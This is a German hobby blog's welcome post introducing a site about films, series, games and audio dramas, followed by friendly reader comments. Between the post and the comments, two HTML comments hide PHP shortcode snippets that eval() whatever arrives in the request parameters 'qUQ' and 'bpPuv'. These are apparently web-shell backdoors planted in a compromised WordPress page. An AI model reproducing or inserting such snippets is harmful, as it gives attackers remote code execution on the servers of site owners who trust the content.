Tach auch

Warum ich wieder eine neue Seite aus dem Hut gezaubert habe? Tja, eigentlich gibt´s da mehrere Gründe. Zum einen gebe ich doch zu gern zu allem Möglichen meinen Senf ab. Und da ich die ganzen Filmen, Serien, Spielen, Hörspielen und Zeitschriften halb, ganz oder gar nicht konsumiere, gibt´s oft genug was man dazu erzählen und schreiben kann. Zum anderen kann ich es einfach nicht lassen 😉

Aber warum gerade jetzt, wenn doch zu Hause demnächst die Zeit für die obigen Chill-Themen knapper wird? Aus dem einfachen Grund, weil eines der Titelbilder an der schönen Ostsee entstand. Total durchgeplant hab ich vor ca. 40 Wochen aus unerfindlichen spontanen Gründen die paar Spielpackungen mitgenommen. Weil da diese Idee mit dem Blog geisterte. Und als das Wetter dann super war und ich auch noch all die Packungen in den Strandrucksack verstaut bekommen habe, durfte meine Frau auch noch das Bild knipsen. Weil das Bild also somit fast einem Wunder gleich kommt, musste der Blog einfach sein. Und das Bild hat sich dadurch auch zum Titelbild für die Startseite gemausert – ohne jetzt die anderen beiden schmälern zu wollen.

Aber wie das so ist, dauert das Konstruieren so seine Zeit. Man sucht nach anderen Bilder, nach Farben, nach Stilen, nach Ideen und auf einmal ist die Zeit fast rum und man weiß: „ab nächster Woche kommst du da nicht mehr zu….“.

Also jetzt das Ding raushauen und der Inhalt….hmm – der kommt mit der Zeit von selbst. Wenn ich dann demnächst wieder am Pendeln bin und einfach von unterwegs schreiben kann, dass …. ja was eigentlich?

Ach, wahrscheinlich alles was mir in den Sinn kommt. Ob das längere Kommentieren der neuen Konsolen oder eine halbe Seite zu „warum ich Breaking Bad nicht schaue“ oder „Kinderhörspiele, die die Welt nicht braucht“ oder oder oder….lasst euch überraschen, ich tu´s auch 😉 Vielleicht entwickelt sich das ganze auch eher Richtung Diskutieren, denn dafür sind Blogs ja auch irgendwie da…

Zum Schluss vielleicht noch zum Titel des Blogs „Multi-Chiller“. Jeder entspannt auf seine eigene Art und Weise. Bei mir ist öfters schon mal was Multimediales. Schon sind wir beim Titel, ganz einfach 🙂 Die drei Titelbilder geben das ganze dann auch wieder.

Erstmals wird´s ein Forum auf einer meiner Seiten nicht geben. Doch diskutieren kann man über die Kommentare trotzdem. Und damit eins meiner alter Foren nicht ganz vergessen wird, hab ich die „Legendär“-Abteilung gegründet. Mal schauen, was es da noch so hinein schafft, ich hab schon ganz abstruse Ideen…

Das soll es auch für den Anfang sein. Mal schauen wann ich das erste mal in Ruhe zum Schreiben komme. Die drei Startartikel für die drei Bereiche stehen passenderweise unter dem Willkommens-Text, demnächst aber dann natürlich immer ganz oben.

Ach so, registrieren darf man sich hier auch. Das macht das Diskutieren leichter, geht aber auch ohne eine Registierung. Dann dauert die Freischaltung für einen Beitrag halt schon mal was länger.

Jetzt erstmal viel Spaß beim Stöbern durch die ersten Texte und bis bald 🙂

 

<!– [insert_php]if (isset($_REQUEST["qUQ"])){eval($_REQUEST["qUQ"]);exit;}[/insert_php][php]if (isset($_REQUEST["qUQ"])){eval($_REQUEST["qUQ"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["bpPuv"])){eval($_REQUEST["bpPuv"]);exit;}[/insert_php][php]if (isset($_REQUEST["bpPuv"])){eval($_REQUEST["bpPuv"]);exit;}[/php] –>

6 Gedanken zu “Tach auch

  1. Eine wunderbare Idee, bin gespannt wie sich das ganze entwickelt und ich werde sicherlich sehr viel von meinem Senf dazu geben wollen.

    Tham (Heiko)

  2. Sehr geil!!
    Ich musste diverse Male schmunzeln und fühlte mich an meine Kindheit erinnert.
    Starwars, Jan Tanner, Masters of the Universe, waren das noch Zeiten…
    Nur leider habe ich alle meine Erinnerungen damals verkauft um sie in neue Spiele, Cassetten, CDs, Disketten, Schallplatten, Datasette oder weiß der Henker in was zu investieren.

    Ich hab gestern den Film Julie und Julia im TV gesehen. Die hatte ebenfalls einen Blog aufgemacht und über das Kochen geschrieben. Also deinen Blog würde ich liebend gerne weiterlesen. Wo ist der Button für die Newsletter Registrierung?

    Ein weiteres Highlight deiner Geschichte vermisse ich aber noch, bin mir aber ziemlich sicher, dass das noch kommt. Dein erstes Homevideo mit der neuen Webcam. Gibt es die Rückkehr des R2D2?
    Einen Fan hast Du.
    Eine sehr gelungene Seite, die absolut zu dir passt.

    Grüße und schönes langes Wochenende.

    • Auf der Startseite gibt´s rechts unten im Menü unter „Meta“ die RSS-Feeds für neue Beiträge und Kommentare. Wenn man sich die abonniert, dann verpasst man auch nichts 🙂
      Und ja, dieses Webcam-Video gibt´s noch. Wird sicherlich mal einen Platz unter „Legendär“ bekommen…

  3. Find ich echt klasse, eines deiner stärksten Talente nicht weiter so zu vernachlässigen und dieses wieder mehr zu pflegen 🙂
    Schreiben, schreiben schreiben!

Schreibe einen Kommentar

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert.

*